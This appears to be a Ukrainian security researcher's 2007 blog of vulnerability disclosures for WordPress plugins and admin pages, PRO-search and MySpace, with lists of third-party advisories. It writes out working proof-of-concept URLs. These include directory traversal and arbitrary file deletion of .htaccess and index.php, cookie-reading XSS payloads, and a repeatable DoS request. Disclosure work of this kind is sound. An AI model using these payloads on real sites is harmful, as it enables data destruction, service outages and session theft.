Websecurity - Веб безпека

30.07.2007

У лютому, 06.02.2007, я знайшов Cross-Site Scripting уразливість на популярному проекті http://itware.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.12.2007

HTTP Response Splitting + XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

В червні, 05.06.2007, я знайшов Directory traversal, Arbitrary file deletion та Denial of Service уразливості в WordPress. А 28.10.2007 ще додатково Cross-Site Scripting уразливість. Дірки в файлі wp-db-backup.php - в плагіні WordPress Database Backup.

В минулому році була знайдена Directory traversal уразливість в плагіні WordPress WP-DB Backup. Котра була виправлена в WP 2.0.4.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Як я виявив даний плагін також вразливий до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше стосовно іншої дірки в цьому движку - Local file include та Directory traversal в WordPress.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Ця дірка також вже була виправлена в WP 2.0.4. Тому вразлива WordPress 2.0.3 і попередні версії. Окрім Directory traversal, я ще виявив інші уразливості.

Також можливо видалити довільний файл на сервері (на котрий має права даний користувач). Тому що плагін WordPress Database Backup видаляє файли, до котрих відбувається запит - причому незалежно від того, чи скачає користувач файл, чи ні, в будь-якому випадку файл видаляється.

Arbitrary file deletion:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Це також може бути використано для проведення DoS-атаки. При видаленні index.php сайт перестане нормально функціонувати.

DoS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

Вразлива WordPress 2.0.3 і попередні версії.

XSS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

В даній добірці уразливості в веб додатках:

• Vulnerability in Twiki (деталі)
• TippingPoint IPS Signature Evasion (деталі)
• TippingPoint detection bypass (деталі)
• Inertia News Remote File Include (деталі)
• XSS in eWay (деталі)
• XSS in lighttpd (деталі)
• XSS in communityserver (деталі)
• Commands execution vulnerability in Typo3 (деталі)
• Multiple PHP remote file inclusion vulnerabilities in Valdersoft Shopping Cart (деталі)
• PHP-інклюдинг в Messagerie Locale (деталі)
• Directory traversal vulnerability in E-Uploader Pro (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Carsen Klock TextSend 1.5 (деталі)
• SQL injection vulnerability in Eric GUILLAUME uploader&downloader 3 (деталі)
• PHP-інклюдинг в OWLLib (деталі)
• SQL-ін’єкція в JiRo’s FAQ Manager (деталі)

Ще в січні були оприлюднені DoS (віддалений і локальний) та File Disclosure уразливості в WordPress. Вразливі версії WordPress до 2.1.

• Multiple Remote Vulnerabilities in Wordpress (деталі)

Denial of Service та File Disclosure дірки наявні в XMLRPC та Pingback реалізаціях в движку. Дані уразливості були виправлені в нових версіях WP.

22.04.2007

Нещодавно, 19.04.2007, я знайшов нові Cross-Site Scripting (XSRF + XSS) уразливості на популярному порталі http://myspace.com. Про що найближчим часом сповіщу адміністрацію порталу.

Раніше я вже писав про уразливості на myspace.com та нову уразливість на myspace.com. Деталі про дані уразливості я вже вислав організаторам проекту Місяць багів в MySpace.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.12.2007

XSS:

POST запит в параметрах password та passwordConfirm на сторінці http://signup.myspace.com/index.cfm?fuseaction=join.step1verify:

MySpace_XSS_exploit4

POST запит в параметрах password та passwordConfirm на сторінці http://signup.myspace.com/index.cfm?fuseaction=bandjoin.step1verify:

MySpace_XSS_exploit5

Дані уразливості вже виправлені.

Нещодавно, 18.12.2007, я знайшов нові Cross-Site Scripting уразливості в WordPress. Дірки в файлах theme-editor.php, themes.php та profile-update.php. Вразливі WordPress 2.0.7 і попередні версії.

XSS:

http://site/wp-admin/theme-editor.php?file=wp-content/themes/default/style.css&theme=WordPress+Default&action=update&xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&stylesheet=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&template=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://sites/wp-admin/themes.php?action=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/profile-update.php?xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В кінці минулого року я писав про подібні уразливості в WordPress. Тому дані уразливості - це доповнення до раніше знайдених мною дір в WP 2.0.x. У версії WordPress 2.0.9 вони вже виправлені.

В даній добірці уразливості в веб додатках:

• mcRefer SQL injection (деталі)
• XSS in Rainbow with Rainbow.Zen (деталі)
• local bug :[xxs] in whm (деталі)
• Capital Request Forms Db Username and Password Vulnerabilities (деталі)
• eXtreme File Hosting remote file upload vulnerability (деталі)
• SQL injection vulnerability in DevTrack 6.0.3 (деталі)
• Cross-site scripting (XSS) vulnerability in DevTrack 6.x (деталі)
• Cross-site scripting (XSS) vulnerability in VerliAdmin (деталі)
• Cross-site scripting (XSS) vulnerability in WebCalendar 1.0.4 (деталі)
• Cross-site scripting (XSS) vulnerability in Web Automated Perl Portal (WebAPP) (деталі)
• Filtering bypass in Web Automated Perl Portal (WebAPP) (деталі)
• SQL-ін’єкція в Wallpaper Website (деталі)
• SQL-ін’єкція в Recipes Website (деталі)
• Multiple PHP remote file inclusion vulnerabilities in Paristemi (деталі)
• PHP-інклюдинг в HIOX Star Rating System Script (деталі)

19.08.2007

Раніше я вже писав про XSS уразливість в PRO-search. І ось нещодавно, 11.08.2007, я знайшов нові уразливості в пошуковому движку PRO-search. Всього виявив 8 Cross-Site Scripting та одну Denial of Service уразливість.

Деталі уразливостей з’являться пізніше. Розробнику системи я вже про них повідомив.

24.12.2007

XSS:

Уразливості на головній сторінці в параметрах prot, host, path, name, ext, size, search_days, show_page.

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Пошуковець шукає по всім файлам, що може призвести до DoS (чим більше значення show_page, тим більша затримка сервера). DoS короткотривалий, тому для проведення DoS атаки потрібно регулярно (щосекундно) посилати запит до сервера.

Уразливі версії PRO-search 0.17.x та усі попередні версії.

Ще в минулому році були оприлюднені SQL Error та Full path disclosure уразливості в WordPress. Вразлива версія WordPress 2.0.3.

• WordPress 2.0.3 SQL Error and Full Path Disclosure (деталі)

Дана SQL Error була виправлена в нових версіях WP. А ось зазначені Full path disclosure (49 дірок), як я вже писав, так і не були виправлені навіть в самій останній версії WP.

В даній добірці уразливості в веб додатках:

• Vulnerability in the “Show debugging information” feature in MoinMoin (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Info pages in MoinMoin (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin (деталі)
• Multiple vulnerabilities in vbDrupal (деталі)
• [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel (деталі)
• nabopoll 1.1.2 sensitive file (admin without password) (деталі)
• Allons_voter Version 1.0 xss and admin votes (деталі)
• PHP remote file inclusion vulnerability in VerliAdmin (деталі)
• Multiple SQL injection vulnerabilities in VerliAdmin (деталі)
• Обхід каталогу в Wabbit PHP Gallery Script (деталі)
• SQL-ін’єкція в Enthrallweb eClassifieds (деталі)
• Cross-zone scripting vulnerability in Darksky RSS bar for Internet Explorer (деталі)
• Міжсайтовий скриптінг в My Little Weblog (деталі)
• SQL-ін’єкція в Woltlab Burning Board Lite (деталі)
• PHP remote file inclusion vulnerability in Carsen Klock TextSend 1.5 (деталі)